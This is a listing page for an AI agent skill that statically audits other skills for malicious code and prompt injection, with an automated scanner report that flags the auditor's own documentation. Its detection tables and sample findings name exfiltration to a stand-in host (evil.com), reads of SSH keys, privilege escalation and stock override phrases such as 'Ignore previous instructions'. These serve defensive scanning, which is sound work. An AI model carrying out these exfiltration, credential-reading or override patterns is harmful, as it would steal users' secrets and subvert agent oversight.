Skill Security Auditor

Security audit and vulnerability scanner for AI agent skills before installation. Use when: (1) evaluating a skill from an untrusted source, (2) auditing a skill directory or git repo URL for malicious code, (3) pre-install security gate for Claude Code plugins, OpenClaw skills, or Codex skills, (4) scanning Python scripts for dangerous patterns like os.system, eval, subprocess, network exfiltration, (5) detecting prompt injection in SKILL.md files, (6) checking dependency supply chain risks, (7) verifying file system access stays within skill boundaries. Triggers: "audit this skill", "is this skill safe", "scan skill for security", "check skill before install", "skill security check", "skill vulnerability scan".

Gitix AI · 7 days ago · Engineering · v1

#engineering

SkillSpector CRITICAL

100/100 ✕ DO NOT USE

8 security findings detected

MEDIUM Data Exfiltration · External Transmission 60% confidence

Match: requests.post("https://

Line 102

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

   Fix: Replace eval() with ast.literal_eval() or explicit parsing

🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
   Pattern: requests.post("https://evil.com/collect", data=results)
   Risk: Data exfiltration to external server
   Fix: Remove outbound network calls or verify destination is trusted

Verify the destination URL is trusted and necessary. Remove or replace with documented APIs. Ensure no secrets, tokens, or PII are transmitted.

MEDIUM Excessive Agency · Unrestricted Tool Access 80% confidence

Match: Run any command

Line 50

Skill grants unrestricted tool access without appropriate constraints. An agent with unfettered tool access can perform arbitrary actions including file modification, network requests, and code execution.

| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |
| **Excessive permissions** | "Run any command", "Full filesystem access" | 🟡 HIGH |
| **Data extraction** | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->

### 3. Dependency Supply Chain

Restrict tool access to only the tools required for the skill's stated purpose. Use an explicit allowlist rather than granting blanket access.

MEDIUM Privilege Escalation · Sudo/Root Execution 80% confidence

Match: chmod 777

Line 36

Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.

| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |
| **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
| **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH |
| **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL |
| **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
| **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO |

Avoid sudo/root unless strictly required. Prefer least-privilege patterns. If elevation is needed, document the justification and scope.

HIGH Privilege Escalation · Credential Access 90% confidence

Match: ~/.ssh/id_rsa

Line 107

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

   Fix: Remove outbound network calls or verify destination is trusted

🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
   Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
   Risk: Reads SSH private key outside skill scope
   Fix: Remove filesystem access outside skill directory

Remove references to credential paths. Use environment variables or secrets managers. For docs, use placeholder paths (e.g., /path/to/config). Never load .env or token files in production code paths.

HIGH Prompt Injection · Instruction Override 80% confidence

Match: Ignore previous instructions

Line 46

This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

| Pattern | Example | Severity |
|---------|---------|----------|
| **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |

Remove or rewrite any text that instructs the agent to ignore prompts, override safety rules, or trust unverified content. Ensure skill content cannot be injected to alter agent behavior.

HIGH Prompt Injection · Hidden Instructions 70% confidence

Line 46

Hidden instructions were detected in comments or invisible text. These could contain malicious directives. Manual review is recommended.

| Pattern | Example | Severity |
|---------|---------|----------|
| **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |

Audit all comments and invisible characters. Remove any instructions that direct the agent to perform unauthorized actions. Use plain, reviewable content.

HIGH Tool Misuse · Tool Parameter Abuse 80% confidence

Match: subprocess.call(shell=True

Line 30

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

| Category | Patterns Detected | Severity |
|----------|-------------------|----------|
| **Command injection** | `os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution | 🔴 CRITICAL |
| **Code execution** | `eval()`, `exec()`, `compile()`, `__import__()` | 🔴 CRITICAL |
| **Obfuscation** | base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains | 🔴 CRITICAL |
| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |

Validate all tool parameters against an allowlist. Reject dangerous parameter values (shell=True, --force, -rf /) and use safe defaults.

HIGH Tool Misuse · Tool Parameter Abuse 80% confidence

Match: chmod 777

Line 36

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |
| **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
| **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH |
| **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL |
| **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
| **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO |

Validate all tool parameters against an allowlist. Reject dangerous parameter values (shell=True, --force, -rf /) and use safe defaults.

SKILL.md

Download View history

# Skill Security Auditor Scan and audit AI agent skills for security risks before installation. Produces a clear **PASS / WARN / FAIL** verdict with findings and remediation guidance. ## Quick Start ```bash # Audit a local skill directory python3 scripts/skill_security_auditor.py /path/to/skill-name/ # Audit a skill from a git repo python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name # Audit with strict mode (any WARN becomes FAIL) python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict # Output JSON report python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json ``` ## What Gets Scanned ### 1. Code Execution Risks (Python/Bash Scripts) Scans all `.py`, `.sh`, `.bash`, `.js`, `.ts` files for: | Category | Patterns Detected | Severity | |----------|-------------------|----------| | **Command injection** | `os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution | 🔴 CRITICAL | | **Code execution** | `eval()`, `exec()`, `compile()`, `__import__()` | 🔴 CRITICAL | | **Obfuscation** | base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains | 🔴 CRITICAL | | **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL | | **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL | | **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH | | **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL | | **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH | | **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO | ### 2. Prompt Injection in SKILL.md Scans SKILL.md and all `.md` reference files for: | Pattern | Example | Severity | |---------|---------|----------| | **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL |  | **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL |  | **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL |  | **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH | | **Excessive permissions** | "Run any command", "Full filesystem access" | 🟡 HIGH | | **Data extraction** | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL |  ### 3. Dependency Supply Chain For skills with `requirements.txt`, `package.json`, or inline `pip install`: | Check | What It Does | Severity | |-------|-------------|----------| | **Known vulnerabilities** | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL | | **Typosquatting** | Flag packages similar to popular ones (e.g., `reqeusts`) | 🟡 HIGH | | **Unpinned versions** | Flag `requests>=2.0` vs `requests==2.31.0` | ⚪ INFO | | **Install commands in code** | `pip install` or `npm install` inside scripts | 🟡 HIGH | | **Suspicious packages** | Low download count, recent creation, single maintainer | ⚪ INFO | ### 4. File System & Structure | Check | What It Does | Severity | |-------|-------------|----------| | **Boundary violation** | Scripts referencing paths outside skill directory | 🟡 HIGH | | **Hidden files** | `.env`, dotfiles that shouldn't be in a skill | 🟡 HIGH | | **Binary files** | Unexpected executables, `.so`, `.dll`, `.exe` | 🔴 CRITICAL | | **Large files** | Files >1MB that could hide payloads | ⚪ INFO | | **Symlinks** | Symbolic links pointing outside skill directory | 🔴 CRITICAL | ## Audit Workflow 1. **Run the scanner** on the skill directory or repo URL 2. **Review the report** — findings grouped by severity 3. **Verdict interpretation:** - **✅ PASS** — No critical or high findings. Safe to install. - **⚠️ WARN** — High/medium findings detected. Review manually before installing. - **❌ FAIL** — Critical findings. Do NOT install without remediation. 4. **Remediation** — each finding includes specific fix guidance ## Reading the Report ``` ╔══════════════════════════════════════════════╗ ║ SKILL SECURITY AUDIT REPORT ║ ║ Skill: example-skill ║ ║ Verdict: ❌ FAIL ║ ╠══════════════════════════════════════════════╣ ║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║ ╚══════════════════════════════════════════════╝ 🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42 Pattern: eval(user_input) Risk: Arbitrary code execution from untrusted input Fix: Replace eval() with ast.literal_eval() or explicit parsing 🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88 Pattern: requests.post("https://evil.com/collect", data=results) Risk: Data exfiltration to external server Fix: Remove outbound network calls or verify destination is trusted 🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15 Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))  Risk: Reads SSH private key outside skill scope Fix: Remove filesystem access outside skill directory ⚪ INFO [DEPS-UNPIN] requirements.txt:3 Pattern: requests>=2.0 Risk: Unpinned dependency may introduce vulnerabilities Fix: Pin to specific version: requests==2.31.0 ``` ## Advanced Usage ### Audit a Skill from Git Before Cloning ```bash # Clone to temp dir, audit, then clean up python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup ``` ### CI/CD Integration ```yaml # GitHub Actions step - name: "audit-skill-security" run: | python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi ``` ### Batch Audit ```bash # Audit all skills in a directory for skill in skills/*/; do python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl done ``` ## Threat Model Reference For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see [references/threat-model.md](references/threat-model.md). ## Limitations - Cannot detect logic bombs or time-delayed payloads with certainty - Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it - Network destination reputation checks require internet access - Does not execute code — static analysis only (safe but less complete than dynamic analysis) - Dependency vulnerability checks use local pattern matching, not live CVE databases When in doubt after an audit, **don't install**. Ask the skill author for clarification.

Comments (0)

No comments yet. Be the first!